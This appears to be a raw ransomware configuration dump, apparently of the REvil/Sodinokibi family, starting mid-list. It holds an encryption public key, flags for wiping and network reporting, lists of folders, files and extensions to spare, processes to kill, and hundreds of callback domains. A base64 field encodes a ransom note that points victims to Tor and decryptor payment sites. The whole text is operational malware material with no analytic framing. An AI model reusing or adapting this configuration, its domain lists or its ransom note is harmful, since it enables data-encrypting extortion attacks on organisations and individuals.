ale.biz;directique.com;kompresory-opravy.com;transifer.fr;affligemsehondenschool.be;autoteamlast.de;nrgvalue.com;duthler.nl;aslog.fr;nutriwell.com.sg;spectamarketingdigital.com.br;amco.net.au;tweedekansenloket.nl;ahgarage.com;askstaffing.com;justaroundthecornerpetsit.com;the-beauty-guides.com;sycamoregreenapts.com;latableacrepes-meaux.fr;belinda.af;solidhosting.nl;topautoinsurers.net;pvandambv.nl;forskolinslimeffect.net;pharmeko-group.com;cuadc.org;sharonalbrightdds.com;cardsandloyalty.com;tchernia-conseil.fr;opticahubertruiz.com;adterium.com;myplaywin3.com;blavait.fr;mediogiro.com.ar;ivancacu.com;kookooo.com;mazift.dk;livedeveloper.com;curtsdiscountguns.com;lyricalduniya.com;jlgraphisme.fr;creohn.de;vapiano.fr;lollachiro.com;t3brothers.com;rizplakatjaya.com;four-ways.com;polynine.com;ox-home.com;levelseven.be;raeoflightmusic.com;teutoradio.de;circuit-diagramz.com;lapponiasafaris.com;citiscapes-art.com;apogeeconseils.fr;the3-week-diet.net;brighthillgroup.com;mariannelemenestrel.com;soundseeing.net;randyabrown.com;queertube.net;eos-horlogerie.com;martha-frets-ceramics.nl;molinum.pt;qandmmusiccenter.com;explora.nl;profiz.com;ayudaespiritualtamara.com;cssp-mediation.org;collegetennis.info;mieleshopping.it;atelierkomon.com;fla.se;jobkiwi.com.ng;gratiocafeblog.wordpress.com;lifeinbreaths.com;naukaip.ru;zaczytana.com;n-newmedia.de;campusce.com;beauty-traveller.com;linkbuilding.life;bundan.com;greatofficespaces.net;ikzoekgod.be;allinonecampaign.com;radishallgood.com;bookingwheel.com;specialtyhomeservicesllc.com;alisodentalcare.com;oportowebdesign.com;whoopingcrane.com;pilotgreen.com;neonodi.be;omegamarbella.com;kiraribeaute-nani.com;newonestop.com;motocrossplace.co.uk;pubcon.com;riffenmattgarage.ch;theboardroomafrica.com;glennverschueren.be;fazagostar.co;atma.nl;lisa-poncon.fr;projektparkiet.pl;jandhpest.com;andrealuchesi.it;galaniuklaw.com;digitale-elite.de;ketomealprep.academy;cormanmarketing.com;nginx.com;fotoeditores.com;1deals.com;11.in.ua;flossmoordental.com;orchardbrickwork.com;glende-pflanzenparadies.de;alwaysdc.com;cleanroomequipment.ie;janellrardon.com;ddmgen.com;ruggestar.ch;ncn.nl;campinglaforetdetesse.com;ziliak.com;thegrinningmanmusical.com;ilveshistoria.com;customroasts.com;bluelakevision.com;oexebusiness.com;asiaartgallery.jp;vitormmcosta.com;metcalfe.ca;palmecophilippines.com;mariamalmahdi.com;hawaiisteelbuilding.com;olry-cloisons.fr;vitoriaecoturismo.com.br;bakingismyyoga.com;myfbateam.com;onesynergyinternational.com;webforsites.com;zdrowieszczecin.pl;premier-iowa.com;wordpress.idium.no;nieuwsindeklas.be;dcc-eu.com;drbrianhweeks.com;innersurrection.com;hm-com.com;test-teleachat.fr;letterscan.de;mangimirossana.it;o90.dk;mensemetgesigte.co.za;stitch-n-bitch.com;easydental.ae;ijsselbeton.nl;palmenhaus-erfurt.de;mundo-pieces-auto.fr;birthplacemag.com;fridakids.com;juergenblaetz.de;ziliak.com;sealgrinderpt.com;finnergo.eu;energosbit-rp.ru;trainiumacademy.com;epicjapanart.com;signamedia.de;profibersan.com;tellthebell.website;springfieldplumbermo.com;larchwoodmarketing.com;suitesartemis.gr;bertbutter.nl;medicalsupportco.com;molade.nl;mondolandscapes.com;alexwenzel.de;drbenveniste.com;boloria.de;aheadloftladders.co.uk;stage-infirmier.fr;dantreranch.com;citydogslife.com;johnkoen.com;sachainchiuk.com;sshomme.com;initconf.com;martinipstudios.com;skooppi.fi;catering.com;saint-malo-developpement.fr;mariajosediazdemera.com;campusescalade.com;uncensoredhentaigif.com;auto-opel.ro;dennisverschuur.com;berdonllp.com;maxcube24.com.ua;pinthelook.com;advanced-removals.co.uk;jacquesgarcianoto.com;ced-elec.com;sochi-okna23.ru;pansionatblago.ru;malevannye.ru;banukumbak.com;rozmata.com;fascaonline.com;bcmets.info;mslp.org;perfectgrin.com;tramadolhealth.com;clinic-beethovenstrasse-ag.ch;skyscanner.ro;bodymindchallenger.com;rokthetalk.com;furland.ru;datatri.be;traitware.com;chorusconsulting.net;akwaba-safaris.com;avis.mantova.it;thepixelfairy.com;patassociation.com;factorywizuk.com;muni.pe;manzel.tn;iron-mine.ru;julielusktherapy.com;3daywebs.com;weddingceremonieswithtim.com;onlinetvgroup.com;billyoart.com;colored-shelves.com;tzn.nu;annenymus.com;xtensifi.com;finsahome.co.uk;narca.net;prodentalblue.com;centuryvisionglobal.com;hawthornsretirement.co.uk;wyreforest.net;simpleitsolutions.ch;foerderverein-vatterschule.de;reygroup.pt;ideamode.com;lashandbrowenvy.com;tutvracks.com;thestudio.academy;stanleyqualitysystems.com;ledyoucan.com;entdoctor-durban.com;goeppinger-teppichreinigung.de;parksideseniorliving.net;aciscomputers.com;cascinarosa33.it;apmollerpension.com;triplettabordeaux.fr;cymru.futbol;miscbo.it;licensed-public-adjuster.com;arabianmice.com;speakaudible.com;littlesaints.academy;nourella.com;deziplan.ru;hostingbangladesh.net;frameshift.it;protoplay.ca;min-virksomhed.dk;direitapernambuco.com;harleystreetspineclinic.com;redpebblephotography.com;beandrivingschool.com.au;stathmoulis.gr;happycatering.de;netadultere.fr;mustangmarketinggroup.com;evsynthacademy.org;m2graph.fr;site.markkit.com.br;arazi.eus;stressreliefadvice.com;internestdigital.com;wasnederland.nl;domilivefurniture.com;der-stempelking.de;5thactors.com;hoteltantra.com;boyfriendsgoal.site;bendel-partner.de;paradigmlandscape.com;nexstagefinancial.com;zinnystar.com;professionetata.com;happylublog.wordpress.com;moira-cristescu.com;rhino-storage.co.uk;carsten.sparen-it.de;die-immo-agentur.de;nalliasmali.net;lovcase.com;factoriareloj.com;sweetz.fr;bodet150ans.com;qwikcoach.com;schroederschoembs.com;tages-geldvergleich.de;glas-kuck.de;fotoslubna.com;azerbaycanas.com;bohrlochversicherung.info;laaisterplakky.nl;production-stills.co.uk;scotlandsroute66.co.uk;shrinkingplanet.com;agendatwentytwenty.com;spirello.nl;singletonfinancial.com;kryddersnapsen.dk;girlish.ae;levencovka.ru;nationnewsroom.com;santastoy.store;cp-bap.de;ocduiblog.com;andermattswisswatches.ch;pinkxgayvideoawards.com;descargandoprogramas.com;apiarista.de;5pointpt.com;lgiwines.com;rossomattonecase.it;powershell.su;premiumweb.com.ua:443;oro.ae;ikadomus.com;ygallerysalonsoho.com:443;ronielyn.com;brisbaneosteopathic.com.au;pourlabretagne.bzh;metroton.ru;richardiv.com;putzen-reinigen.com;metriplica.academy;fitnessblenderstory.com;lassocrm.com;hensleymarketing.com;b3b.ch;louiedager.com;yvesdoin-aquarelles.fr;nicksrock.com;log-barn.co.uk;scentedlair.com;xrresources.com;promus.ca;logosindustries.com;airvapourbarrier.com;sppdstats.com;rhino-turf.com;catchup-mag.com;noda.com.ua;motocrosshideout.com;fta-media.com;tbalp.co.uk;brunoimmobilier.com;valiant-voice.com;leopoldineroux.com;loysonbryan.com;schulz-moelln.de;geoweb.software;eksperdanismanlik.com;artcase.pl;tatyanakopieva.ru;jdscenter.com;ruggestar.ch;elex.is;tilldeeke.de;ncjc.ca;framemyballs.com;alltagsrassismus-entknoten.de;christopherhannan.com;yuanshenghotel.com;prometeyagro.com.ua;albcleaner.fr;smartmind.net;xn--ziinoapte-6ld.ro;gosouldeep.com;reizenmetkinderen.be;mrmac.com;airserviceunlimited.com;globalskills.pt;nuohous.com;gsconcretecoatings.com;ykobbqchicken.ca;yourcosmicbeing.com;greenrider.nl;internalresults.com;subquercy.fr;liverpoolabudhabi.ae;the5thquestion.com;osn.ro;tanatek.com;nepressurecleaning.com;universelle.fr;jameswilliamspainting.com;nxtstg.org;elliemaccreative.wordpress.com;witraz.pl;rechtenplicht.be;agriturismocastagneto.it;antesacademy.it;encounter-p.net;primemarineengineering.com;sveneulberg.de;texanscan.org;sarahspics.co.uk;rename.kz;leloupblanc.gr;ceocenters.com;perceptdecor.com;luvbec.com;salonlamar.nl;kvetymichalovce.sk;qrs-international.com;janasfokus.com;topvijesti.net;worldproskitour.com;wineandgo.hu;hameghlim.com;line-x.co.uk;mikegoodfellow.co.uk;tradenavigator.ch;indiebizadvocates.org;rvside.com;clemenfoto.dk;stabilisateur.fr;belofloripa.be;tecleados.com;bd2fly.com;gardenpartner.pl;hvitfeldt.dk;teamsegeln.ch;angelika-schwarz.com;suonenjoen.fi;kartuindonesia.com;startuplive.org;parseport.com;agenceassemble.fr;altitudeboise.com;egpu.fr;anleggsregisteret.no;bellesiniacademy.org;sjtpo.org;kafkacare.com;adedesign.com;haard-totaal.nl;saberconcrete.com;rishigangoly.com;alattekniksipil.com;vdolg24.online;dentourage.com;billscars.net;devus.de;dogsunlimitedguide.com;dentalcircle.com;astrographic.com;wademurray.com;bourchier.org;alene.co;bruut.online;jaaphoekzema.nl;limounie.com;slideevents.be;mind2muscle.nl;hypogenforensic.com;cainlaw-okc.com;mbuildinghomes.com;carmel-york.com;edvestors.org;unislaw-narty.pl;from02pro.com;cotton-avenue.co.il;speiserei-hannover.de;dierenambulancealkmaar.nl;slotenmakerszwijndrecht.nl;interlinkone.com;breathebettertolivebetter.com;triplettagaite.fr;itheroes.dk;bringmehope.org;ya-elka.ru;advancedeyecare.com;ebible.co;bg.szczecin.pl;solutionshosting.co.uk;skidpiping.de;mediabolmong.com;vipcarrental.ae;zorgboerderijravensbosch.nl;luvinsburger.fr;altocontatto.net;leatherjees.com;masecologicos.com;kristianboennelykke.dk;teethinadaydentalimplants.com;phukienbepthanhdat.com", "net": true, "nbody": "LQAtAC0APQA9AD0AIABXAGUAbABjAG8AbQBlAC4AIABBAGcAYQBpAG4ALgAgAD0APQA9AC0ALQAtAA0ACgANAAoAWwArAF0AIABXAGgAYQB0AHMAIABIAGEAcABwAGUAbgA/ACAAWwArAF0ADQAKAA0ACgBZAG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAsACAAYQBuAGQAIABjAHUAcgByAGUAbgB0AGwAeQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAuACAAWQBvAHUAIABjAGEAbgAgAGMAaABlAGMAawAgAGkAdAA6ACAAYQBsAGwAIABmAGkAbABlAHMAIABvAG4AIAB5AG8AdQAgAGMAbwBtAHAAdQB0AGUAcgAgAGgAYQBzACAAZQB4AHAAYQBuAHMAaQBvAG4AIAB7AEUAWABUAH0ALgANAAoAQgB5ACAAdABoAGUAIAB3AGEAeQAsACAAZQB2AGUAcgB5AHQAaABpAG4AZwAgAGkAcwAgAHAAbwBzAHMAaQBiAGwAZQAgAHQAbwAgAHIAZQBjAG8AdgBlAHIAIAAoAHIAZQBzAHQAbwByAGUAKQAsACAAYgB1AHQAIAB5AG8AdQAgAG4AZQBlAGQAIAB0AG8AIABmAG8AbABsAG8AdwAgAG8AdQByACAAaQBuAHMAdAByAHUAYwB0AGkAbwBuAHMALgAgAE8AdABoAGUAcgB3AGkAcwBlACwAIAB5AG8AdQAgAGMAYQBuAHQAIAByAGUAdAB1AHIAbgAgAHkAbwB1AHIAIABkAGEAdABhACAAKABOAEUAVgBFAFIAKQAuAA0ACgANAAoAWwArAF0AIABXAGgAYQB0ACAAZwB1AGEAcgBhAG4AdABlAGUAcwA/ACAAWwArAF0ADQAKAA0ACgBJAHQAcwAgAGoAdQBzAHQAIABhACAAYgB1AHMAaQBuAGUAcwBzAC4AIABXAGUAIABhAGIAcwBvAGwAdQB0AGUAbAB5ACAAZABvACAAbgBvAHQAIABjAGEAcgBlACAAYQBiAG8AdQB0ACAAeQBvAHUAIABhAG4AZAAgAHkAbwB1AHIAIABkAGUAYQBsAHMALAAgAGUAeABjAGUAcAB0ACAAZwBlAHQAdABpAG4AZwAgAGIAZQBuAGUAZgBpAHQAcwAuACAASQBmACAAdwBlACAAZABvACAAbgBvAHQAIABkAG8AIABvAHUAcgAgAHcAbwByAGsAIABhAG4AZAAgAGwAaQBhAGIAaQBsAGkAdABpAGUAcwAgAC0AIABuAG8AYgBvAGQAeQAgAHcAaQBsAGwAIABuAG8AdAAgAGMAbwBvAHAAZQByAGEAdABlACAAdwBpAHQAaAAgAHUAcwAuACAASQB0AHMAIABuAG8AdAAgAGkAbgAgAG8AdQByACAAaQBuAHQAZQByAGUAcwB0AHMALgANAAoAVABvACAAYwBoAGUAYwBrACAAdABoAGUAIABhAGIAaQBsAGkAdAB5ACAAbwBmACAAcgBlAHQAdQByAG4AaQBuAGcAIABmAGkAbABlAHMALAAgAFkAbwB1ACAAcwBoAG8AdQBsAGQAIABnAG8AIAB0AG8AIABvAHUAcgAgAHcAZQBiAHMAaQB0AGUALgAgAFQAaABlAHIAZQAgAHkAbwB1ACAAYwBhAG4AIABkAGUAYwByAHkAcAB0ACAAbwBuAGUAIABmAGkAbABlACAAZgBvAHIAIABmAHIAZQBlAC4AIABUAGgAYQB0ACAAaQBzACAAbwB1AHIAIABnAHUAYQByAGEAbgB0AGUAZQAuAA0ACgBJAGYAIAB5AG8AdQAgAHcAaQBsAGwAIABuAG8AdAAgAGMAbwBvAHAAZQByAGEAdABlACAAdwBpAHQAaAAgAG8AdQByACAAcwBlAHIAdgBpAGMAZQAgAC0AIABmAG8AcgAgAHUAcwAsACAAaQB0AHMAIABkAG8AZQBzACAAbgBvAHQAIABtAGEAdAB0AGUAcgAuACAAQgB1AHQAIAB5AG8AdQAgAHcAaQBsAGwAIABsAG8AcwBlACAAeQBvAHUAcgAgAHQAaQBtAGUAIABhAG4AZAAgAGQAYQB0AGEALAAgAGMAYQB1AHMAZQAgAGoAdQBzAHQAIAB3AGUAIABoAGEAdgBlACAAdABoAGUAIABwAHIAaQB2AGEAdABlACAAawBlAHkALgAgAEkAbgAgAHAAcgBhAGMAdABpAHMAZQAgAC0AIAB0AGkAbQBlACAAaQBzACAAbQB1AGMAaAAgAG0AbwByAGUAIAB2AGEAbAB1AGEAYgBsAGUAIAB0AGgAYQBuACAAbQBvAG4AZQB5AC4ADQAKAA0ACgBbACsAXQAgAEgAbwB3ACAAdABvACAAZwBlAHQAIABhAGMAYwBlAHMAcwAgAG8AbgAgAHcAZQBiAHMAaQB0AGUAPwAgAFsAKwBdAA0ACgANAAoAWQBvAHUAIABoAGEAdgBlACAAdAB3AG8AIAB3AGEAeQBzADoADQAKAA0ACgAxACkAIABbAFIAZQBjAG8AbQBtAGUAbgBkAGUAZABdACAAVQBzAGkAbgBnACAAYQAgAFQATwBSACAAYgByAG8AdwBzAGUAcgAhAA0ACgAgACAAYQApACAARABvAHcAbgBsAG8AYQBkACAAYQBuAGQAIABpAG4AcwB0AGEAbABsACAAVABPAFIAIABiAHIAbwB3AHMAZQByACAAZgByAG8AbQAgAHQAaABpAHMAIABzAGkAdABlADoAIABoAHQAdABwAHMAOgAvAC8AdABvAHIAcAByAG8AagBlAGMAdAAuAG8AcgBnAC8ADQAKACAAIABiACkAIABPAHAAZQBuACAAbwB1AHIAIAB3AGUAYgBzAGkAdABlADoAIABoAHQAdABwADoALwAvAGEAcABsAGUAYgB6AHUANAA3AHcAZwBhAHoAYQBwAGQAcQBrAHMANgB2AHIAYwB2ADYAegBjAG4AagBwAHAAawBiAHgAYgByADYAdwBrAGUAdABmADUANgBuAGYANgBhAHEAMgBuAG0AeQBvAHkAZAAuAG8AbgBpAG8AbgAvAHsAVQBJAEQAfQANAAoADQAKADIAKQAgAEkAZgAgAFQATwBSACAAYgBsAG8AYwBrAGUAZAAgAGkAbgAgAHkAbwB1AHIAIABjAG8AdQBuAHQAcgB5ACwAIAB0AHIAeQAgAHQAbwAgAHUAcwBlACAAVgBQAE4AIQAgAEIAdQB0ACAAeQBvAHUAIABjAGEAbgAgAHUAcwBlACAAbwB1AHIAIABzAGUAYwBvAG4AZABhAHIAeQAgAHcAZQBiAHMAaQB0AGUALgAgAEYAbwByACAAdABoAGkAcwA6AA0ACgAgACAAYQApACAATwBwAGUAbgAgAHkAbwB1AHIAIABhAG4AeQAgAGIAcgBvAHcAcwBlAHIAIAAoAEMAaAByAG8AbQBlACwAIABGAGkAcgBlAGYAbwB4ACwAIABPAHAAZQByAGEALAAgAEkARQAsACAARQBkAGcAZQApAA0ACgAgACAAYgApACAATwBwAGUAbgAgAG8AdQByACAAcwBlAGMAbwBuAGQAYQByAHkAIAB3AGUAYgBzAGkAdABlADoAIABoAHQAdABwADoALwAvAGQAZQBjAHIAeQBwAHQAbwByAC4AdABvAHAALwB7AFUASQBEAH0ADQAKAA0ACgBXAGEAcgBuAGkAbgBnADoAIABzAGUAYwBvAG4AZABhAHIAeQAgAHcAZQBiAHMAaQB0AGUAIABjAGEAbgAgAGIAZQAgAGIAbABvAGMAawBlAGQALAAgAHQAaABhAHQAcwAgAHcAaAB5ACAAZgBpAHIAcwB0ACAAdgBhAHIAaQBhAG4AdAAgAG0AdQBjAGgAIABiAGUAdAB0AGUAcgAgAGEAbgBkACAAbQBvAHIAZQAgAGEAdgBhAGkAbABhAGIAbABlAC4ADQAKAA0ACgBXAGgAZQBuACAAeQBvAHUAIABvAHAAZQBuACAAbwB1AHIAIAB3AGUAYgBzAGkAdABlACwAIABwAHUAdAAgAHQAaABlACAAZgBvAGwAbABvAHcAaQBuAGcAIABkAGEAdABhACAAaQBuACAAdABoAGUAIABpAG4AcAB1AHQAIABmAG8AcgBtADoADQAKAEsAZQB5ADoADQAKAA0ACgB7AEsARQBZAH0ADQAKAA0ACgANAAoARQB4AHQAZQBuAHMAaQBvAG4AIABuAGEAbQBlADoADQAKAA0ACgB7AEUAWABUAH0ADQAKAA0ACgAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ADQAKAA0ACgAhACEAIQAgAEQAQQBOAEcARQBSACAAIQAhACEADQAKAEQATwBOAFQAIAB0AHIAeQAgAHQAbwAgAGMAaABhAG4AZwBlACAAZgBpAGwAZQBzACAAYgB5ACAAeQBvAHUAcgBzAGUAbABmACwAIABEAE8ATgBUACAAdQBzAGUAIABhAG4AeQAgAHQAaABpAHIAZAAgAHAAYQByAHQAeQAgAHMAbwBmAHQAdwBhAHIAZQAgAGYAbwByACAAcgBlAHMAdABvAHIAaQBuAGcAIAB5AG8AdQByACAAZABhAHQAYQAgAG8AcgAgAGEAbgB0AGkAdgBpAHIAdQBzACAAcwBvAGwAdQB0AGkAbwBuAHMAIAAtACAAaQB0AHMAIABtAGEAeQAgAGUAbgB0AGEAaQBsACAAZABhAG0AZwBlACAAbwBmACAAdABoAGUAIABwAHIAaQB2AGEAdABlACAAawBlAHkAIABhAG4AZAAsACAAYQBzACAAcgBlAHMAdQBsAHQALAAgAFQAaABlACAATABvAHMAcwAgAGEAbABsACAAZABhAHQAYQAuAA0ACgAhACEAIQAgACEAIQAhACAAIQAhACEADQAKAE8ATgBFACAATQBPAFIARQAgAFQASQBNAEUAOgAgAEkAdABzACAAaQBuACAAeQBvAHUAcgAgAGkAbgB0AGUAcgBlAHMAdABzACAAdABvACAAZwBlAHQAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYgBhAGMAawAuACAARgByAG8AbQAgAG8AdQByACAAcwBpAGQAZQAsACAAdwBlACAAKAB0AGgAZQAgAGIAZQBzAHQAIABzAHAAZQBjAGkAYQBsAGkAcwB0AHMAKQAgAG0AYQBrAGUAIABlAHYAZQByAHkAdABoAGkAbgBnACAAZgBvAHIAIAByAGUAcwB0AG8AcgBpAG4AZwAsACAAYgB1AHQAIABwAGwAZQBhAHMAZQAgAHMAaABvAHUAbABkACAAbgBvAHQAIABpAG4AdABlAHIAZgBlAHIAZQAuAA0ACgAhACEAIQAgACEAIQAhACAAIQAhACEAAAA=", "nname": "{EXT}-readme.txt", "exp": false, "img": "QQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA"}
{"pk": "N9tiPqA45L8cXACRHlBdJFayV8M5MEF4JjppDRO+oHU=", "pid": "30", "sub": "113", "dbg": false, "fast": true, "wipe": true, "wht": {"fld": ["perflogs", "$windows.~ws", "system volume information", "google", "programdata", "appdata", "windows.old", "windows", "intel", "program files", "application data", "msocache", "mozilla", "$windows.~bt", "boot", "$recycle.bin", "tor browser", "program files (x86)"], "fls": ["ntuser.ini", "thumbs.db", "ntuser.dat", "autorun.inf", "ntldr", "ntuser.dat.log", "bootsect.bak", "boot.ini", "iconcache.db", "bootfont.bin", "desktop.ini"], "ext": ["cpl", "cmd", "diagpkg", "adv", "mod", "ico", "deskthemepack", "msi", "ani", "cab", "theme", "scr", "hlp", "com", "prf", "msp", "exe", "mpa", "diagcab", "key", "386", "hta", "ps1", "nls", "drv", "cur", "dll", "diagcfg", "icl", "bin", "spl", "msc", "lnk", "rom", "bat", "lock", "themepack", "ldf", "nomedia", "msstyles", "rtp", "sys", "msu", "icns", "shs", "ocx", "idx", "wpx", "ics"]}, "wfld": ["backup"], "prc": ["thebat64.exe", "dbsnmp.exe", "mydesktopqos.exe", "wordpad.exe", "sqlwriter.exe", "agntsvc.exe", "winword.exe", "mysqld.exe", "excel.exe", "mysqld_nt.exe", "msaccess.exe", "sqlbrowser.exe", "isqlplussvc.exe", "encsvc.exe", "steam.exe", "infopath.exe", "sqlservr.exe", "oracle.exe", "sqbcoreservice.exe", "thebat.exe", "firefoxconfig.exe", "ocomm.exe", "mydesktopservice.exe", "tbirdconfig.exe", "msftesql.exe", "thunderbird.exe", "onenote.exe", "mspub.exe", "xfssvccon.exe", "dbeng50.exe", "ocautoupds.exe", "visio.exe", "sqlagent.exe", "powerpnt.exe", "synctime.exe", "ocssd.exe", "mysqld_opt.exe", "outlook.exe"], "dmn": "p-ride.live;avtoboss163.ru:443;rarefoods.ro;brownswoodblog.com;patriotcleaning.net;so-sage.fr;katherinealy.com;innovationgames-brabant.nl;eshop.design;drvoip.com;liepertgrafikweb.at;rino-gmbh.com;monstarrsoccer.com;thenalpa.com;thiagoperez.com;fskhjalmar.se;eafx.pro;oncarrot.com;axisoflove.org:443;aquacheck.co.za;bajova.sk;innovationgames-brabant.nl;charlottelhanna.com;ilovefullcircle.com;dnqa.co.uk;catalyseurdetransformation.com;imajyuku-sozoku.com;kelsigordon.com;handyman-silkeborg.dk;pxsrl.it;poems-for-the-soul.ch;jimprattmediations.com;gaearoyals.com;advance-refle.com;pixelhealth.net;electricianul.com;unexplored.gr;look.academy;endlessrealms.net;bonitabeachassociation.com;pro-gamer.pl;donau-guides.eu;9nar.com;hartofurniture.com;silverbird.dk;smartercashsystem.com;pedmanson.com;publicompserver.de;georgemuncey.com;delegationhub.com;kenmccallum.com;rentingwell.com;animation-pro.co.uk;diakonie-weitramsdorf-sesslach.de;hiddensee-buhne11.de;expohomes.com;laylavalentine.com;quitescorting.com;pisofare.co;babysitting-hk.helpergo.co;johnsonweekly.com;jglconsultancy.com;barbaramcfadyenjewelry.com;alnectus.com;matthieupetel.fr;sber-biznes.com;supercarhire.co.uk;sunsolutions.es;the-cupboard.co.uk;computer-place.de;jobstomoveamerica.org;testitjavertailut.net;go.labibini.ch;funworx.de;chatterchatterchatter.com;lsngroupe.com;iexpert99.com;espaciopolitica.com;skinkeeper.li;cookinn.nl;zuerich-umzug.ch;toranjtuition.org;fidelitytitleoregon.com;pankiss.ru;amyandzac.com;janmorgenstern.com;keyboardjournal.com;fire-space.com;grafikstudio-visuell.de;ufovidmag.com;corporacionrr.com;jeanmonti.com;baptistdistinctives.org;jalkapuu.net;placermonticello.com;unboxtherapy.site;jollity.hu;housesofwa.com;sbit.ag;drnelsonpediatrics.com;grupoexin10.com;klapanvent.ru;davedavisphotos.com;pajagus.fr;spartamovers.com;etgdogz.de;legundschiess.de;soncini.ch;cmeow.com;111firstdelray.com;tieronechic.com;lesyeuxbleus.net;kickittickets.com;awag-blog.de;skolaprome.eu;graygreenbiomedservices.com;concontactodirecto.com;block-optic.com;golfclublandgoednieuwkerk.nl;auberives-sur-vareze.fr;casinodepositors.com;kausette.com;acibademmobil.com.tr;diverfiestas.com.es;skoczynski.eu;paprikapod.com;jlwilsonbooks.com;baikalflot.ru;dayenne-styling.nl;rs-danmark.dk;hnkns.com;kemtron.fr;husetsanitas.dk;dentallabor-luenen.de;oththukaruva.com;baita.ac;aktivfriskcenter.se;iactechnologies.net;hotelturbo.de;encounter-p.net;signededenroth.dk;fi-institutionalfunds.com;floweringsun.org;rentsportsequip.com;abulanov.com;web865.com;nbva.co.uk;mneti.ru;xn--billigafrgpatroner-stb.se;wirmuessenreden.com;bilius.dk;wrinstitute.org;karmeliterviertel.com;smartspeak.com;blucamp.com;jakubrybak.com;phoenixcrane.com;billigeflybilletter.dk;rsidesigns.com;hinotruckwreckers.com.au;cxcompany.com;yayasanprimaunggul.org;deduktia.fi;matteoruzzaofficial.com;volta.plus;eastgrinsteadwingchun.com;livelai.com;betterce.com;veggienessa.com;buzzneakers.com;stralsund-ansichten.de;leansupremegarcinia.net;invela.dk;cac2040.com;lagschools.ng;ciga-france.fr;gta-jjb.fr;buonabitare.com;wallflowersandrakes.com;mamajenedesigns.com;mahikuchen.com;dr-vita.de;renehartman.nl;basindentistry.com;mrkluttz.com;angelsmirrorus.com;yournextshoes.com;eyedoctordallas.com;nepal-pictures.com;plbinsurance.com;triavlete.com;switch-made.com;innervisions-id.com;mac-computer-support-hamburg.de;dinedrinkdetroit.com;scholarquotes.com;pazarspor.org.tr;gurutechnologies.net;otpusk.zp.ua;alharsunindo.com;chainofhopeeurope.eu;walterman.es;adabible.org;theintellect.edu.pk;alcye.com;peppergreenfarmcatering.com.au;mesajjongeren.nl;reputation-medical.online;redctei.co;kuriero.pro;limmortelyouth.com;napisat-pismo-gubernatoru.ru:443;awaisghauri.com;loparnille.se;sololibrerie.it;aberdeenartwalk.org;biodentify.ai;bmw-i-pure-impulse.com;wg-heiligenstadt.de;letsstopsmoking.co.uk;fann.ru;cmascd.com;precisetemp.com;parisschool.ru;zealcon.ae;smartworkplaza.com;druktemakersheerenveen.nl;racefietsenblog.nl;lidkopingsnytt.nu;onlinemarketingsurgery.co.uk;shortsalemap.com;sytzedevries.com;stagefxinc.com;advesa.com;therapybusinessacademy.com;voice2biz.com;lovetzuchia.com;bcabattoirs.org;coachpreneuracademy.com;vvego.com;daveystownhouse.com;proffteplo.com;dmlcpa.com;humanviruses.org;benchbiz.com;alaskaremote.com;penumbuhrambutkeiskei.com;jonnyhooley.com;lunoluno.com;domaine-des-pothiers.com;theater-lueneburg.de;neolaiamedispa.com;mazzaropi.com.br;richardkershawwines.co.za;chatberlin.de;ludoil.it;rtc24.com;relevantonline.eu;hekecrm.com;insane.agency;leadforensics.com;distrifresh.com;morgansconsult.com;kryptos72.com;secrets-clubs.co.uk;slotspinner.com;chinowarehousespace.com;agora-collectivites.com;liveyourheartout.co;denhaagfoodie.nl;baumfinancialservices.com;k-v-f.de;lattalvor.com;akcadagofis.com;frimec-international.es;activeterroristwarningcompany.com;craftron.com;purepreprod4.com;schluesseldienste-hannover.de;ronaldhendriks.nl;brinkdoepke.eu;utilisacteur.fr;malzomattalar.com;almamidwifery.com;dreamvoiceclub.org;cl0nazepamblog.com;avisioninthedesert.com;condormobile.fr;ultimatelifesource.com;bratek-immobilien.de;jax-interim-and-projectmanagement.com;anchelor.com;mike.matthies.de;rattanwarehouse.co.uk;business-basic.de;successcolony.com.ng;taulunkartano.fi;mjk.digital;techybash.com;acumenconsultingcompany.com;docarefoundation.org;amelielecompte.wordpress.com;galatee-couture.com;lmmont.sk;saboboxtel.uk;acornishstudio.co.uk;focuskontur.com;craftstone.co.nz;buerocenter-butzbach-werbemittel.de;fluzfluzrewards.com;rubyaudiology.com;marcandy.com;modamarfil.com;shortysspices.com;bavovrienden.nl;silkeight.com;selected-minds.de;fbmagazine.ru;forextimes.ru;rapid5kloan.org;trivselsguide.dk;epsondriversforwindows.com;sambaglow.com;margaretmcshane.com;tothebackofthemoon.com;azloans.com;mgimalta.com;bubbalucious.com;kellengatton.com;nevadaruralhousingstudies.org;spacebel.be;gatlinburgcottage.com;peninggibadan.co.id;mayprogulka.ru;midwestschool.org;edrickennedymacfoy.com;nykfdyrehospital.dk;sprintcoach.com;irizar.com;dieetuniversiteit.nl;mollymccarthydesign.com;bluetenreich-brilon.de;lumturo.academy;acb-gruppe.ch;angeleyezstripclub.com;augen-praxisklinik-rostock.de;arearugcleaningnyc.com;aoyama.ac;forumsittard.nl;outstandingminialbums.com;arthakapitalforvaltning.dk;bumbipdeco.site;agencewho-aixenprovence.fr;pureelements.nl;yourhappyevents.fr;towelroot.co;ownidentity.com;kenmccallum.com;voetbalhoogeveen.nl;jmmartinezilustrador.com;palema.gr;stoneridgemontessori.com;keuken-prijs.nl;g2mediainc.com;satoblog.org;inewsstar.com;ninjaki.com;metallbau-hartmann.eu;terraflair.de;agrifarm.dk;scietech.academy;goodboyscustom.com;johnstonmingmanning.com;greeneyetattoo.com;nvisionsigns.com;thehovecounsellingpractice.co.uk;nauticmarine.dk;karelinjames.com;o2o-academy.com;vedsegaard